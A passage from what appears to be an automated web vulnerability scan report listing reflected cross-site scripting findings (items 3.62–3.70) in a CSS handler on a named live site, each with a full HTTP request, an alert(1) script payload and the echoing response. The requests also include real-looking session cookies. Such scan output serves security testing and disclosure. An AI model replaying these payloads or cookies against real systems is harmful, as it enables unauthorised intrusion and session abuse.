Issue detail

The value of the b request parameter is copied into the HTML document as plain text between tags. The payload d2745<script>alert(1)</script>43dc6059987 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0d2745<script>alert(1)</script>43dc6059987&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:09 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0d2745<script>alert(1)</script>43dc6059987px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_671 {width:180px;position:relative;margin:0;padding:0;clear:both;}
/*                            */        #mss-slider_671 {width:180px;height:325px;}
/*    loading
...[SNIP]...
3.62. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 4d3c4<script>alert(1)</script>6eee8615daf was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=3254d3c4<script>alert(1)</script>6eee8615daf&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:05 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7814
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_671 {width:180px;position:relative;margin:0;padding:0;clear:both;}
/*                            */        #mss-slider_671 {width:180px;height:3254d3c4<script>alert(1)</script>6eee8615dafpx;}
/*    loading image            */        #slide-loading_671 {width:180px;height:3254d3c4<script>
...[SNIP]...
3.63. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload cb700<script>alert(1)</script>2eeb76a371d was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Defaultcb700<script>alert(1)</script>2eeb76a371d&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:07 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 8142
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
               */        #mss-slider_671 {width:180px;height:325px;}
/*    loading image            */        #slide-loading_671 {width:180px;height:325px;background:transparent url(/DesktopModules/Markit.SlideShow/Templates/Defaultcb700<script>alert(1)</script>2eeb76a371d/loading.gif) no-repeat 50% 50%;text-align:center;}
/*                            */        #slide-wrapper_671 {width:180px;height:325px;display:none;}
/*                            */        #slide-outer_671 {width:180px;height:325px;background:transpa
...[SNIP]...
3.64. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [scbcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the scbcolor request parameter is copied into the HTML document as plain text between tags. The payload 7729e<script>alert(1)</script>549d8b0ab75 was submitted in the scbcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D07729e<script>alert(1)</script>549d8b0ab75&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:30:52 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
------*/

/*--- Play/Pause ---*/
/*                            */        #control-outer_671 {position:absolute;top:2px;right:10px;width:54px;height:13px; z-index:1;background-color:transparent;border:solid 1px #D0D0D07729e<script>alert(1)</script>549d8b0ab75;text-align:center;}
/*    previous button            */        #control-outer_671 #mss-container_671_prev {cursor: pointer;width: 8px;height: 8px;float: left;margin: 2px 4px;background: transparent url('/DesktopModule
...[SNIP]...
3.65. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tbcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tbcolor request parameter is copied into the HTML document as plain text between tags. The payload 3ef75<script>alert(1)</script>b231ec5942f was submitted in the tbcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC3ef75<script>alert(1)</script>b231ec5942f&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:30:49 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7650
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
eat -40px 0;}
/*--------------------------*/

/*--- Timebar Styles ---*/
/*                            */        #timebar-outer_671{position: absolute; top: 4px; left: 10px; width:70px;height:1px;border:solid 1px #CCCCCC3ef75<script>alert(1)</script>b231ec5942f;overflow:hidden;z-index: 1;}
/*                            */        #slide-TimeBar_671{background: #CCCCCC3ef75<script>
...[SNIP]...
3.66. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipbcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tipbcolor request parameter is copied into the HTML document as plain text between tags. The payload a95e1<script>alert(1)</script>200e6e3d8d3 was submitted in the tipbcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DBa95e1<script>alert(1)</script>200e6e3d8d3&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:19 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
}
/*                            */        #slide-TimeBar_671{background: #CCCCCC; width: 1px;}
/*--------------------------*/

/*--- Tooltip Styles ---*/
/*                            */        .tool_671-tip {float: left; border:3px solid #9AC2DBa95e1<script>alert(1)</script>200e6e3d8d3 !important; padding: 5px; background: #FFFFFF !important; max-width: 200px;}
/*                            */        .tool_671-title {color:#666666 !important;font-family:Arial, Verdana, sans-serif !important;font-size:12px !i
...[SNIP]...
3.67. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipbgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tipbgcolor request parameter is copied into the HTML document as plain text between tags. The payload a8b57<script>alert(1)</script>18fd0034016 was submitted in the tipbgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFFa8b57<script>alert(1)</script>18fd0034016 HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:22 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
#CCCCCC; width: 1px;}
/*--------------------------*/

/*--- Tooltip Styles ---*/
/*                            */        .tool_671-tip {float: left; border:3px solid #9AC2DB !important; padding: 5px; background: #FFFFFFa8b57<script>alert(1)</script>18fd0034016 !important; max-width: 200px;}
/*                            */        .tool_671-title {color:#666666 !important;font-family:Arial, Verdana, sans-serif !important;font-size:12px !important; font-weight: bold;padding: 0; margin
...[SNIP]...
3.68. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipborderw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tipborderw request parameter is copied into the HTML document as plain text between tags. The payload 2deae<script>alert(1)</script>d190c5c2481 was submitted in the tipborderw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=32deae<script>alert(1)</script>d190c5c2481&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:15 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
dden;z-index: 1;}
/*                            */        #slide-TimeBar_671{background: #CCCCCC; width: 1px;}
/*--------------------------*/

/*--- Tooltip Styles ---*/
/*                            */        .tool_671-tip {float: left; border:32deae<script>alert(1)</script>d190c5c2481px solid #9AC2DB !important; padding: 5px; background: #FFFFFF !important; max-width: 200px;}
/*                            */        .tool_671-title {color:#666666 !important;font-family:Arial, Verdana, sans-serif !important;f
...[SNIP]...
3.69. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tiptcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tiptcolor request parameter is copied into the HTML document as plain text between tags. The payload bd29b<script>alert(1)</script>421f7dd0323 was submitted in the tiptcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666bd29b<script>alert(1)</script>421f7dd0323&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:17 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
es ---*/
/*                            */        .tool_671-tip {float: left; border:3px solid #9AC2DB !important; padding: 5px; background: #FFFFFF !important; max-width: 200px;}
/*                            */        .tool_671-title {color:#666666bd29b<script>alert(1)</script>421f7dd0323 !important;font-family:Arial, Verdana, sans-serif !important;font-size:12px !important; font-weight: bold;padding: 0; margin: 0; margin-top: -15px; padding-top: 15px; padding-bottom: 5px; }
/*                            
...[SNIP]...
3.70. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tipw request parameter is copied into the HTML document as plain text between tags. The payload d0f9a<script>alert(1)</script>5291c05a6e9 was submitted in the tipw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200d0f9a<script>alert(1)</script>5291c05a6e9&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
